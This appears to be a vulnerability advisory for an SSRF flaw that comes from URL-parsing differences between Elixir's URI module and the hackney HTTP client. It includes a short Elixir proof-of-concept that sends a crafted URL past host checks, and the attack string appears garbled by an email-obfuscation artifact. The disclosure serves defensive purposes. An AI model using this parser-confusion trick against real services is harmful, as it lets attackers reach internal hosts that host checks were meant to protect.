Technical Details: It's possible to conduct SSRF attacks because of the way URLs are parsed by URI built in module and hackey. Given the URL http://[email protected]/, the URI function will parse and see the host as 127.0.0.1 (which is correct), and hackney will see host as 127.2.2.2/ . This can be abused to conduct SSRF attacks where a user is relying on the URL function for host checking. See POC below
import :hackney
defmodule MyApp do
# Helper function to print the URL components
def parse_and_print_url() do
attack_string = "http://[email protected]/"
uri = URI.parse(attack_string)
# Host
host = uri.host
IO.puts("Host: #{host}")
port = uri.port
IO.puts("Port: #{port}")
# httpc sends a request to the right url 127.0.0.1
# {:ok, {{:_, 200, _}, _, body}} = :httpc.request(:get, {attack_string, []}, [], [body_format: :binary])
## IO.puts("Response body: #{body}")
# http poison sends the request to 127.2.2.2
# HTTPoison.start
# HTTPoison.get! attack_string
# hackney which http poison uses sends the request to 127.2.2.2
:hackney.get(attack_string, [], "", async: :once)
end
end
More information regarding this vulnerability and the parser behaviour can be seen here: https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf, https://www.youtube.com/watch?v=28xWcRegncw&pp=ygULb3JhbmdlIHRzYWk%3D